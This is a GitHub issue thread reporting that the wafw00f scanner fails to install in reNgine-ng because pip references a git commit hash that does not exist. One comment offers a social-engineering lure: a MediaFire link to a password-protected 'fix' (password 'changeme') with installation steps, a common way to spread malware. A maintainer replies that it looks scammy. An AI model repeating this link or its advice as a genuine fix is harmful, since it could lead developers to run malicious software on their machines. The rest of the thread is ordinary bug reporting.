### ISSUE TITLE
bug(celery): wafw00f not installed

### ISSUE THREAD

**Issue by psyray** [Security-Tools-Alliance/rengine-ng#165]
### Current Behavior

wafw00f is not installed
git commit used was wrong

```
  error: subprocess-exited-with-error
  
  × git fetch -q https://github.com/EnableSecurity/wafw00f 5e5d8e9e5f1b1b6d9b2c1c1f9f9b9b9b9b9b9b9b did not run successfully.
  │ exit code: 128
  ╰─> [1 lines of output]
      fatal: remote error: upload-pack: not our ref 5e5d8e9e5f1b1b6d9b2c1c1f9f9b9b9b9b9b9b9b
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× git fetch -q https://github.com/EnableSecurity/wafw00f 5e5d8e9e5f1b1b6d9b2c1c1f9f9b9b9b9b9b9b9b did not run successfully.
│ exit code: 128
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.
Cannot determine package name from spec 'git+https://github.com/EnableSecurity/wafw00f@5e5d8e9e5f1b1b6d9b2c1c1f9f9b9b9b9b9b9b9b'. Check package spec for
errors.
```

### Expected Behavior

wafw00f must be installed

### Steps To Reproduce

run the wafw00f command from the top bar menu

### Environment

```markdown
- reNgine: 2.1.0
- OS: debian 12
- Python: 3.10
```

### Acknowledgements

- [X] This issue is not a duplicate of an existing bug report.
- [X] I have chosen an appropriate title.
- [X] All requested information has been provided properly.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnonymousWP** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/6mkbh6xhau31g password: changeme when you installing, you need to place a check in install to path and select "gcc."

Please do not upload files with a password like that, that's very scammy. What do you want to show us?
